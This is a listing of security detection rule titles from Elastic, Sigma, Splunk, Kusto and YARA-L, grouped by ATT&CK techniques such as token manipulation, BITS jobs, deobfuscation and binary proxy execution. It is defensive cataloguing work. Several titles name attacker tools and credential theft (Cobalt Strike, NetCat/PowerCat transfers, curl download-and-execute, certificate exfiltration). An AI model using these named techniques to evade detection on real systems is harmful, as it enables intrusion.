- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Elastic Process Created with a Duplicated Token production
- Kusto PRT Credential Stealing
- Splunk Runas Execution in CommandLine production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
Access Token Manipulation: Create Process with Token T1134.002 16 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma Suspicious Child Process Created as System test
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
Access Token Manipulation: Make and Impersonate Token T1134.003 4 rules
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Elastic Process Creation via Secondary Logon production
Access Token Manipulation: Parent PID Spoofing T1134.004 6 rules
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Elastic Parent Process PID Spoofing production
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: SID-History Injection T1134.005 6 rules
- Sigma Addition of SID History to Active Directory Object stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
Deobfuscate/Decode Files or Information T1140 44 rules
- Sigma Base64 Encoded PowerShell Command Detected test
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Splunk Certutil De-Obfuscate_Decode Files (Sysmon)
- Splunk Certutil De-Obfuscate_Decode Files (Windows Event Log)
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Sigma Certutil payload obfuscation (command) experimental
- Sigma Certutil payload obfuscation - Tchopper (command) experimental
- Splunk CertUtil With Decode Argument production
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Kusto Ingress Tool Transfer - Certutil available
- YARA-L MITRE ATT&CK T1140 Encoded Powershell Command
- Sigma MSHTA Execution with Suspicious File Extensions test
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Ping Hex IP test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Commandline Obfuscation Using Escape Characters test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Decompress Commands test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Kusto Process executed from binary hidden in Base64 encoded file available
- Kusto Qakbot Discovery Activies available
- Elastic Suspicious CertUtil Commands production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious XOR Encoded PowerShell Command test
- Sigma UNC4841 - Download Compressed Files From Temp.sh Using Wget test
- Sigma UNC4841 - Download Tar File From Untrusted Direct IP Via Wget test
- Sigma UNC4841 - SSL Certificate Exfiltration Via Openssl test
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Indirect Command Execution T1202 62 rules
- Sigma Arbitrary Command Execution Using WSL test
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Elastic Command Execution via ForFiles production
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Sigma Custom File Open Handler Executes PowerShell test
- Sigma Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE test
- Elastic Execution via Windows Subsystem for Linux production
- Sigma Findstr Launching .lnk File test
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Splunk Indirect Command Execution (Sysmon)
- Splunk Indirect Command Execution (Windows Event Log)
- Sigma Indirect Command Execution From Script File Via Bash.EXE test
- Elastic Indirect Command Execution via Forfiles/Pcalua production
- Sigma Indirect Command Execution via SFTP ProxyCommand experimental
- Sigma Indirect Inline Command Execution Via Bash.EXE test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled test
- Sigma Potential Arbitrary Command Execution Using Msdt.EXE test
- Sigma Potential Arbitrary Command Execution Via FTP.EXE test
- Sigma Potential Arbitrary DLL Load Using Winword test
- Sigma Potential Arbitrary File Download Using Office Application test
- Sigma Potential Arbitrary File Download Via Cmdl32.EXE test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potentially Suspicious Child Process Of VsCode test
- Sigma Potentially Suspicious Child Processes Spawned by ConHost experimental
- Sigma Potentially Suspicious Office Document Executed From Trusted Location test
- Elastic Proxy Execution via Console Window Host production
- Sigma Proxy Execution via Vshadow experimental
- Elastic Proxy Execution via Windows OpenSSH production
- Sigma Renamed CURL.EXE Execution test
- Sigma Renamed FTP.EXE Execution test
- Sigma Renamed NirCmd.EXE Execution test
- Sigma Renamed PAExec Execution test
- Sigma Renamed PingCastle Binary Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Rundll32 Execution Without CommandLine Parameters test
- Splunk ssh.exe Execution (Sysmon)
- Splunk ssh.exe Execution (Windows Event Log)
- Sigma Suspicious Cabinet File Execution Via Msdt.EXE test
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Splunk Suspicious Conhost.exe Commands (Sysmon)
- Splunk Suspicious Conhost.exe Commands (Windows Event Log)
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Sigma Suspicious High IntegrityLevel Conhost Legacy Option test
- Sigma Suspicious Remote Child Process From Outlook test
- Sigma Suspicious Runscripthelper.exe test
- Sigma Suspicious Service Binary Directory test
- Sigma Suspicious Splwow64 Without Params test
- Sigma Suspicious ZipExec Execution test
- Sigma Troubleshooting Pack Cmdlet Execution test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon Child Process Of Conhost.EXE test
- Sigma Uncommon Child Process Of Setres.EXE test
- Sigma Windows Binary Executed From WSL test
- Splunk Windows Indirect Command Execution Via forfiles production
- Splunk Windows Indirect Command Execution Via pcalua production
- Splunk Windows Indirect Command Execution Via Series Of Forfiles production
- Splunk Windows RunMRU Command Execution production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Elastic Windows Subsystem for Linux Enabled via Dism Utility production
- Sigma WSL Child Process Anomaly test
- Sigma WSL Kali-Linux Usage experimental
Exploitation for Stealth T1211 9 rules
- Kusto ASR Bypassing Writing Executable Content available
- Sigma Audit CVE Event test
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Sigma Microsoft Malware Protection Engine Crash test
- Sigma Microsoft Malware Protection Engine Crash - WER test
- Splunk Suspicious Conhost.exe Commands (Sysmon)
- Splunk Suspicious Conhost.exe Commands (Windows Event Log)
- Sigma Writing Of Malicious Files To The Fonts Folder test
System Script Proxy Execution T1216 19 rules
- Sigma Assembly Loading Via CL_LoadAssembly.ps1 test
- Sigma AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl test
- Sigma AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File test
- Splunk Bash -c Execution - Windows (Sysmon)
- Splunk Bash -c Execution - Windows (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Sigma Launch-VsDevShell.PS1 Proxy Execution test
- Sigma Potential Manage-bde.wsf Abuse To Proxy Execution test
- Sigma Potential Process Execution Proxy Via CL_Invocation.ps1 test
- Sigma Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 test
- Sigma Pubprn.vbs Proxy Execution test
- Sigma Remote Code Execute via Winrm.vbs test
- Sigma Suspicious CustomShellHost Execution test
- Sigma SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code test
- Sigma Uncommon Sigverif.EXE Child Process test
- Sigma UtilityFunctions.ps1 Proxy Dll test
- Splunk Windows System Script Proxy Execution Syncappvpublishingserver production
System Script Proxy Execution: PubPrn T1216.001 2 rules
- Sigma Launch-VsDevShell.PS1 Proxy Execution test
- Sigma Pubprn.vbs Proxy Execution test
System Binary Proxy Execution T1218 526 rules
- Splunk .msc Executed from Unusual Location (Sysmon)
- Splunk .msc Executed from Unusual Location (Windows Event Log)
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma Abusing Print Executable test
- Sigma AddinUtil.EXE Execution From Uncommon Directory test
- Sigma AgentExecutor PowerShell Execution test
- Sigma APT29 2018 Phishing Campaign CommandLine Indicators stable
- Sigma APT29 2018 Phishing Campaign File Indicators stable
- Sigma Arbitrary Command Execution Using WSL test
- Sigma Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE test
- Sigma Arbitrary File Download Via IMEWDBLD.EXE test
- Sigma Arbitrary File Download Via MSEDGE_PROXY.EXE test
- Sigma Arbitrary File Download Via MSOHTMED.EXE test
- Sigma Arbitrary File Download Via MSPUB.EXE test
- Sigma Arbitrary File Download Via PresentationHost.EXE test
- Sigma Arbitrary File Download Via Squirrel.EXE test
- Sigma Arbitrary MSI Download Via Devinit.EXE test
- Sigma Atbroker Registry Change test
- Splunk ATBroker.exe Execution (PowerShell)
- Splunk ATBroker.exe Execution (Sysmon)
- Splunk ATBroker.exe Execution (Windows Event Log)
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma Bad Opsec Defaults Sacrificial Processes With Improper Arguments test
- Splunk Bash -c Execution - Windows (Sysmon)
- Splunk Bash -c Execution - Windows (Windows Event Log)
- Sigma Binary Proxy Execution Via Dotnet-Trace.EXE test
- Sigma BitLockerTogo.EXE Execution test
- Sigma Bypass UAC via CMSTP test
- Splunk CMLUA Or CMSTPLUA UAC Bypass production
- Splunk Cmstp Execution (Sysmon)
- Splunk Cmstp Execution (Windows Event Log)
- Sigma CMSTP Execution Process Access stable
- Sigma CMSTP Execution Process Creation stable
- Sigma CMSTP Execution Registry Event stable
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Sigma CobaltStrike Load by Rundll32 test
- Sigma Code Execution via Pcwutl.dll test
- Sigma COM Object Execution via Xwizard.EXE test
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Control Loading from World Writable Directory production
- Splunk Control Panel Abuse (Sysmon)
- Splunk Control Panel Abuse (Windows Event Log)
- Sigma Control Panel Items test
- Elastic Control Panel Process with Unusual Arguments production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Sigma Created Files by Microsoft Sync Center test
- Elastic Creation of SettingContent-ms Files production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Sigma Curl Download And Execute Combination test
- Elastic Delayed Execution via Ping production
- Splunk Detect HTML Help Renamed production
- Splunk Detect HTML Help Spawn Child Process production
- Splunk Detect HTML Help URL in Command Line production
- Splunk Detect HTML Help Using InfoTech Storage Handlers production
- Splunk Detect mshta inline hta execution production
- Splunk Detect mshta renamed production
- Splunk Detect MSHTA Url in Command Line production
- Splunk Detect Regasm Spawning a Process production
- Splunk Detect Regasm with Network Connection production
- Splunk Detect Regasm with no Command Line Arguments production
- Splunk Detect Regsvcs Spawning a Process production
- Splunk Detect Regsvcs with Network Connection production
- Splunk Detect Regsvcs with No Command Line Arguments production
- Splunk Detect Regsvr32 Application Control Bypass production
- Splunk Detect Rundll32 Inline HTA Execution production
- Sigma DeviceCredentialDeployment Execution test
- Sigma Devtoolslauncher.exe Executes Specified Binary test
- Sigma Diskshadow Child Process Spawned test
- Sigma Diskshadow Script Mode - Execution From Potential Suspicious Location test
- Sigma Diskshadow Script Mode - Uncommon Script Extension Execution test
- Sigma Diskshadow Script Mode Execution test
- Sigma DLL Call by Ordinal Via Rundll32.EXE stable
- Splunk DLL Called with RS32 (PowerShell)
- Splunk DLL Called with RS32 (Sysmon)
- Splunk DLL Called with RS32 (Windows Event Log)
- Splunk DLL Called with Uncommon Function (PowerShell)
- Splunk DLL Called with Uncommon Function (Sysmon)
- Splunk DLL Called with Uncommon Function (Windows Event Log)
- Splunk DLL Execution from Uncommon Process (PowerShell)
- Splunk DLL Execution from Uncommon Process (Sysmon)
- Splunk DLL Execution from Uncommon Process (Windows Event Log)
- Sigma DLL Execution via Rasautou.exe test
- Sigma DLL Loaded From Suspicious Location Via Cmspt.EXE test
- Sigma DLL Loaded via CertOC.EXE test
- Sigma Dllhost.EXE Initiated Network Connection To Non-Local IP Address test
- Splunk DLLRegisterServer Called from Command Line (PowerShell)
- Splunk DLLRegisterServer Called from Command Line (Sysmon)
- Splunk DLLRegisterServer Called from Command Line (Windows Event Log)
- Sigma DllUnregisterServer Function Call Via Msiexec.EXE test
- Sigma DNS Query Request By Regsvr32.EXE test
- Splunk DNX.exe Proxy Execution (Windows Event Log)
- Splunk Dotnet.exe Execution (Windows Event Log)
- Splunk Driver as Command Parameter (Windows Event Log)
- Sigma Driver/DLL Installation Via Odbcconf.EXE test
- Splunk Dxcap Proxy Execution (Windows Event Log)
- Sigma Equation Group DLL_U Export Function Load stable
- Sigma EvilNum APT Golden Chickens Deployment Via OCX Files test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Sigma Execute Files with Msdeploy.exe test
- Sigma Execute Pcwrun.EXE To Leverage Follina test
- Sigma Execution DLL of Choice Using WAB.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of COM object via Xwizard production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Sigma Execution via stordiag.exe test
- Elastic Execution via Windows Command Debugging Utility production
- Sigma Execution via WorkFolders.exe test
- Sigma File Download Using ProtocolHandler.exe test
- Sigma File Download Via InstallUtil.EXE test
- Sigma File Download Via Windows Defender MpCmpRun.EXE test
- Elastic File or Directory Deletion Command production
- Elastic File with Suspicious Extension Downloaded production
- Sigma Fireball Archer Install test
- Sigma Gpscript Execution test
- Splunk Group Policy Editor Execution (PowerShell)
- Splunk Group Policy Editor Execution (Sysmon)
- Splunk Group Policy Editor Execution (Windows Event Log)
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - F-Secure C3 Load by Rundll32 test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HH.EXE Execution test
- Splunk hh.exe Execution (PowerShell)
- Splunk hh.exe Execution (Sysmon)
- Splunk hh.exe Execution (Windows Event Log)
- Sigma HH.EXE Initiated HTTP Network Connection test
- Splunk hh.exe Remote File Execution (PowerShell)
- Splunk hh.exe Remote File Execution (Sysmon)
- Splunk hh.exe Remote File Execution (Windows Event Log)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 test
- Sigma Ie4uinit Lolbin Use From Invalid Path test
- Splunk IIS Worker (W3WP) Spawn Command Line (Windows Event Log)
- Elastic ImageLoad via Windows Update Auto Update Client production
- Sigma Import LDAP Data Interchange Format File Via Ldifde.EXE test
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Sigma Indirect Command Execution By Program Compatibility Wizard test
- Sigma InfDefaultInstall.exe .inf Execution test
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Elastic InstallUtil Activity production
- Elastic InstallUtil Process Making Network Connections production
- Sigma Kapeka Backdoor Execution Via RunDLL32.EXE test
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Sigma Legitimate Application Dropped Archive test
- Sigma Legitimate Application Dropped Executable test
- Sigma Legitimate Application Dropped Script test
- Sigma Legitimate Application Writing Files In Uncommon Location experimental
- Splunk LOLBAS With Network Traffic production
- Sigma Lolbin Runexehelper Use As Proxy test
- Sigma Lolbin Unregmp2.exe Use As Proxy test
- Splunk Malicious InProcServer32 Modification production
- Sigma Malicious PE Execution by Microsoft Visual Studio Debugger test
- Sigma Malicious Windows Script Components File Execution by TAEF Detection test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Sigma Microsoft Workflow Compiler Execution test
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MpiExec Lolbin test
- Sigma MSDT Execution Via Answer File test
- Sigma MSHTA Execution with Suspicious File Extensions test
- Elastic Mshta Making Network Connections production
- Splunk Mshta spawning Rundll32 OR Regsvr32 Process production
- Splunk MSHTA.exe execution (PowerShell)
- Splunk MSHTA.exe execution (Sysmon)
- Splunk MSHTA.exe execution (Windows Event Log)
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma MSI Installation From Web test
- Splunk MSI Installation via Appcert (PowerShell)
- Splunk MSI Installation via Appcert (Sysmon)
- Splunk MSI Installation via Appcert (Windows Event Log)
- Splunk Msiexec Abuse (Sysmon)
- Splunk Msiexec Abuse (Windows Event Log)
- Splunk MSIExec Install MSI File (Sysmon)
- Splunk MSIExec Install MSI File (Windows Event Log)
- Sigma Msiexec Quiet Installation test
- Elastic MsiExec Service Child Process With Network Connection production
- Sigma MsiExec Web Install test
- Splunk MSIExec.exe Execution (Sysmon)
- Splunk MSIExec.exe Execution (Windows Event Log)
- Sigma Msiexec.EXE Initiated Network Connection Over HTTP test
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated By AddinUtil.EXE test
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Network Connection via Certutil production
- Elastic Network Connection via Compiled HTML File production
- Elastic Network Connection via Registration Utility production
- Elastic Network Connection via Signed Binary production
- Sigma New Capture Session Launched Via DXCap.EXE test
- Sigma New DLL Registered Via Odbcconf.EXE test
- Sigma New Self Extracting Package Created Via IExpress.EXE test
- Sigma NotPetya Ransomware Activity test
- Splunk Nslookup Execution (Windows Event Log)
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Sigma Odbcconf.EXE Suspicious DLL Location test
- Sigma OneNote.EXE Execution of Malicious Embedded Scripts test
- Sigma OpenWith.exe Executes Specified Binary test
- Sigma Outbound Network Connection Initiated By Cmstp.EXE test
- Sigma Outbound Network Connection To Public IP Via Winlogon test
- Elastic Persistence via a Windows Installer production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Sigma Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 test
- Sigma Potential Arbitrary File Download Via Cmdl32.EXE test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Sigma Potential Binary Proxy Execution Via VSDiagnostics.EXE test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command and Control via Internet Explorer production
- Sigma Potential Compromised 3CXDesktopApp Execution test
- Sigma Potential Compromised 3CXDesktopApp Update Activity test
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Defense Evasion via CMSTP.exe production
- Sigma Potential Devil Bait Malware Reconnaissance test
- Sigma Potential DLL Sideloading Activity Via ExtExport.EXE test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Emotet Rundll32 Execution test
- Sigma Potential EmpireMonkey Activity test
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Elastic Potential Execution via FileFix Phishing Attack production
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access experimental
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential File Download Via MS-AppInstaller Protocol Handler test
- Elastic Potential File Transfer via Certreq production
- Sigma Potential LethalHTA Technique Execution test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution test
- Sigma Potential NTLM Coercion Via Certutil.EXE test
- Sigma Potential Password Spraying Attempt Using Dsacls.EXE test
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Sigma Potential PowerShell Execution Via DLL test
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential Provisioning Registry Key Abuse For Binary Proxy Execution test
- Sigma Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG test
- Sigma Potential Provlaunch.EXE Binary Proxy Execution Abuse test
- Sigma Potential Proxy Execution Via Explorer.EXE From Shell Process test
- Sigma Potential Raspberry Robin CPL Execution Activity test
- Sigma Potential Register_App.Vbs LOLScript Abuse test
- Sigma Potential Regsvr32 Commandline Flag Anomaly test
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module test
- Sigma Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock test
- Sigma Potential Suspicious Child Process Of 3CXDesktopApp test
- Sigma Potential Suspicious Mofcomp Execution test
- Splunk Potential Sysinternals Tool Execution (PowerShell)
- Splunk Potential Sysinternals Tool Execution (Sysmon)
- Splunk Potential Sysinternals Tool Execution (Windows Event Log)
- Sigma Potentially Over Permissive Permissions Granted Using Dsacls.EXE test
- Sigma Potentially Suspicious Cabinet File Expansion test
- Sigma Potentially Suspicious Child Process Of DiskShadow.EXE test
- Sigma Potentially Suspicious Child Process Of Regsvr32 test
- Sigma Potentially Suspicious Child Process Of VsCode test
- Sigma Potentially Suspicious Child Processes Spawned by ConHost experimental
- Sigma Potentially Suspicious CMD Shell Output Redirect test
- Sigma Potentially Suspicious DLL Registered Via Odbcconf.EXE test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension test
- Sigma Potentially Suspicious Regsvr32 HTTP IP Pattern test
- Sigma Potentially Suspicious Regsvr32 HTTP/FTP Pattern test
- Sigma Potentially Suspicious Rundll32 Activity test
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Sigma Potentially Suspicious Self Extraction Directive File Created test
- Sigma Potentially Suspicious Wuauclt Network Connection test
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Sigma PowerShell WMI Win32_Product Install MSI test
- Sigma Process Access via TrolleyExpress Exclusion test
- Elastic Process Activity via Compiled HTML File production
- Splunk Process Creation Using Sysnative Folder (Sysmon)
- Splunk Process Creation Using Sysnative Folder (Windows Event Log)
- Kusto Process Injection Initiated By MMC
- Sigma Process Memory Dump Via Dotnet-Dump test
- Sigma Process Proxy Execution Via Squirrel.EXE test
- Sigma Program Executed Using Proxy/Local Command Via SSH.EXE test
- Sigma Proxy Execution Via Wuauclt.EXE test
- Sigma RegAsm.EXE Execution Without CommandLine Flags or Files experimental
- Sigma RegAsm.EXE Initiating Network Connection To Public IP test
- Sigma REGISTER_APP.VBS Proxy Execution test
- Sigma Regsvr32 DLL Execution With Suspicious File Extension test
- Splunk regsvr32 Execution (PowerShell)
- Splunk regsvr32 Execution (Sysmon)
- Splunk regsvr32 Execution (Windows Event Log)
- Sigma Regsvr32 Execution From Highly Suspicious Location test
- Sigma Regsvr32 Execution From Potential Suspicious Location test
- Splunk regsvr32 Referencing Unusual Paths (Sysmon)
- Splunk regsvr32 Referencing Unusual Paths (Windows Event Log)
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Splunk Regsvr32 Silent and Install Param Dll Loading production
- Splunk Regsvr32 with Known Silent Switch Cmdline production
- Sigma Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly test
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Windows Event Log)
- Splunk Remote .msi Installation (Windows Event Log)
- Sigma Remote CHM File Download/Execution Via HH.EXE test
- Sigma Remote File Download Via Findstr.EXE test
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses test
- Sigma Remotely Hosted HTA File Executed Via Mshta.EXE test
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed MegaSync Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Response File Execution Via Odbcconf.EXE test
- Sigma Rhadamanthys Stealer Module Launch Via Rundll32.EXE test
- Splunk RunDLL Loading DLL By Ordinal production
- Splunk Rundll32 Command Line (PowerShell)
- Splunk Rundll32 Command Line (Sysmon)
- Splunk Rundll32 Command Line (Windows Event Log)
- Splunk Rundll32 Control RunDLL Hunt production
- Splunk Rundll32 Control RunDLL World Writable Directory production
- Splunk Rundll32 DNSQuery production
- Sigma Rundll32 Execution With Uncommon DLL Extension test
- Sigma Rundll32 InstallScreenSaver Execution test
- Sigma Rundll32 Internet Connection test
- Splunk Rundll32 LockWorkStation production
- Splunk Rundll32 Process Creating Exe Dll Files production
- Sigma RunDLL32 Spawning Explorer test
- Splunk Rundll32 Suspicious Command Line (PowerShell)
- Splunk Rundll32 Suspicious Command Line (Sysmon)
- Splunk Rundll32 Suspicious Command Line (Windows Event Log)
- Splunk rundll32 Suspicious Parent Process (Sysmon)
- Splunk rundll32 Suspicious Parent Process (Windows Event Log)
- Sigma Rundll32 UNC Path Execution test
- Splunk Rundll32 with no Command Line Arguments with Network production
- Splunk rundll32 with No DLL in Command Line (Sysmon)
- Splunk rundll32 with No DLL in Command Line (Windows Event Log)
- Splunk Rundll32.exe as Parent Process (Sysmon)
- Splunk Rundll32.exe as Parent Process (Windows Event Log)
- Sigma Rundll32.EXE Calling DllRegisterServer Export Function Explicitly test
- Splunk rundll32.exe Executing DLL from Non-standard Directory (PowerShell)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Sysmon)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Windows Event Log)
